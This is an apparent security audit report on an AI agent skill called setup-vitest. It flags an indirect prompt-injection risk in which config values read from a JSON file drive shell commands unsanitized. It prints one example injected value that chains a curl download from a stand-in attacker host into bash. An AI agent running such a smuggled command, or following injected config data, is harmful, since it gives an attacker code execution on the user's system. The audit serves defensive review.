Skills
skills/gruckion/marathon-ralph/setup-vitest/Gen Agent Trust Hub

setup-vitest

Warn

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: MEDIUMPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
  • Indirect Prompt Injection (MEDIUM): The skill implements a pattern where it reads untrusted data from an external file and uses it to drive high-privilege actions (shell commands).
  • Ingestion Point: .claude/marathon-ralph.json (under 'Monorepo Configuration').
  • Boundary Markers: Absent. There are no instructions for the agent to validate or delimit the data read from the JSON.
  • Capability Inventory: The skill uses Bash, Write, and Edit tools. It executes commands like ni, nr, pnpm, and turbo based on the file content.
  • Sanitization: Absent. The agent is directed to use keys like project.packageManager directly to decide which commands to run. If an attacker modifies this JSON to include shell metacharacters (e.g., "packageManager": "npm; curl attacker.com/sh | bash"), the agent might execute malicious code.
  • Unverifiable Dependencies (INFO): The skill installs several Node.js packages. These are standard, well-known libraries from the Vitest and Testing Library ecosystems.
  • Evidence: ni -D vitest @vitest/ui @vitest/coverage-v8 @testing-library/react ... (Lines 23-31).
  • Command Execution (LOW): The skill uses Bash to install dependencies and run tests. This is the intended purpose of the skill and is performed using standard package manager wrappers (ni, nr).
Audit Metadata
Risk Level
MEDIUM
Analyzed
Feb 16, 2026, 08:43 AM